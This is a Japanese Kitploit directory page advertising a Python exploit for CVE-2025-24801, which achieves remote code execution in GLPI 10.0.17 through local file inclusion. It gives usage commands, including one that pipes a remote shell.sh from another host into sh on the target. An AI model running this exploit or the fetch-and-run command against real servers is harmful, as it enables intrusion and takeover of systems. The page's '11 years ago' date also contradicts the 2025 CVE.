Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Exploit-CVE-2025-24801 — Python製のCVE-2025-24801エクスプロイトで、GLPI 10.0.17のローカルファイルインクルージョンを介したリモートコード実行を実現します。ポストエクスプロイテーション用のコマンド実行モードを含みます。 | Kitploit
ツール/GitHubGitHub/r1beirin/exploit-cve-2025-24801
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubr1beirin/exploit-cve-2025-24801

Exploit-CVE-2025-24801

Python製のCVE-2025-24801エクスプロイトで、GLPI 10.0.17のローカルファイルインクルージョンを介したリモートコード実行を実現します。ポストエクスプロイテーション用のコマンド実行モードを含みます。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-24801

このエクスプロイトは、CVE-2025-24801 を利用して、GLPI 10.0.17 の Local File Inclusion (LFI) を介して Remote Code Execution (RCE) を実現します。この CVE の Proof of Concept (PoC) は、GLPI におけるこの脆弱性の説明です。

注意事項

一部のアプリケーションは /glpi/ エンドポイントを公開しています(例: http://172.16.11.130:8080/glpi/front/computer.form.php)。ターゲットアプリケーションがこのエンドポイントを含む場合は、それを --url パラメータに追加する必要があります(例: --url http://172.16.11.130:8080/glpi)。

使用方法

使用例。

root@kitploit:~
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password

すでにこのエクスプロイトを実行して RCE を発動した場合は、--cmd パラメータを使用してコマンドを実行するだけで済みます。

root@kitploit:~
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password --cmd "curl http://10.0.10.235/shell.sh | sh"
ツールをダウンロード